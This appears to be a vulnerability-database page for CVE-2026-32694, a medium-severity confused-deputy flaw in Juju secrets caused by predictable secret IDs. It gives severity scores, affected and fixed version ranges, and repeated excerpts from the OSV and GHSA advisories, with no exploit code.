CVE-2026-32694
published 2026-03-18CVE-2026-32694: In Juju from version 3.0.0 through 3.6.18, when a secret owner grants permissions to a secret to a grantee, the secret owner relies exclusively on a…
PriorityP337medium6.6CVSS 3.1
AVNACHPRHUINSUCHIHAH
EPSS
0.27%
18.4th percentile
In Juju from version 3.0.0 through 3.6.18, when a secret owner grants permissions to a secret to a grantee, the secret owner relies exclusively on a predictable XID of the secret to verify ownership. This allows a malicious grantee which can request secrets to predict past secrets granted by the same secret owner to different grantees, allowing them to use the resources granted by those past secrets. Successful exploitation relies on a very specific configuration, specific data semantic, and the administrator having the need to deploy at least two different applications, one of them controlled by the attacker.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | juju | >= 3.0.0 < 3.6.19 | 3.6.19 |
| github.com | juju_juju | >= 0.0.0-20221021155847-35c560704ee2 < 0.0.0-20260319091847-d06919eb03ec | 0.0.0-20260319091847-d06919eb03ec |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Juju affected by Confused Deputy IDOR attack via Predictable user specified ID in Juju Secrets in github.com/juju/juju
osv·2026-03-23
CVE-2026-32694 Juju affected by Confused Deputy IDOR attack via Predictable user specified ID in Juju Secrets in github.com/juju/juju
Juju affected by Confused Deputy IDOR attack via Predictable user specified ID in Juju Secrets in github.com/juju/juju
Juju affected by Confused Deputy IDOR attack via Predictable user specified ID in Juju Secrets in github.com/juju/juju
GHSA
Juju affected by Confused Deputy IDOR attack via Predictable user specified ID in Juju Secrets
ghsa·2026-03-19
CVE-2026-32694 [MEDIUM] CWE-343 Juju affected by Confused Deputy IDOR attack via Predictable user specified ID in Juju Secrets
Juju affected by Confused Deputy IDOR attack via Predictable user specified ID in Juju Secrets
### Summary
Predictable secret ID and lack of secret origin API enable confused deputy attacks on Juju workloads.
### Details
A Juju application can create a secret and grant it to another integrated application (grantee).
When they do so, the secret owner has to communicate the secret id to the grantee.
The grantee, having received the secret id can load the secret content and perform operations on behalf of the secret owner.
However, today the grantee has no way to determine which granted secret belongs to which owner.
Instead the grantee relies on:
- being able to read the secret by id (secret was in fact granted, by some entity)
- secret id was received over a relation (the remote end
OSV
Juju affected by Confused Deputy IDOR attack via Predictable user specified ID in Juju Secrets
osv·2026-03-19
CVE-2026-32694 [MEDIUM] Juju affected by Confused Deputy IDOR attack via Predictable user specified ID in Juju Secrets
Juju affected by Confused Deputy IDOR attack via Predictable user specified ID in Juju Secrets
### Summary
Predictable secret ID and lack of secret origin API enable confused deputy attacks on Juju workloads.
### Details
A Juju application can create a secret and grant it to another integrated application (grantee).
When they do so, the secret owner has to communicate the secret id to the grantee.
The grantee, having received the secret id can load the secret content and perform operations on behalf of the secret owner.
However, today the grantee has no way to determine which granted secret belongs to which owner.
Instead the grantee relies on:
- being able to read the secret by id (secret was in fact granted, by some entity)
- secret id was received over a relation (the remote end
No detection rules found.
No public exploits indexed.
2026-03-18
Published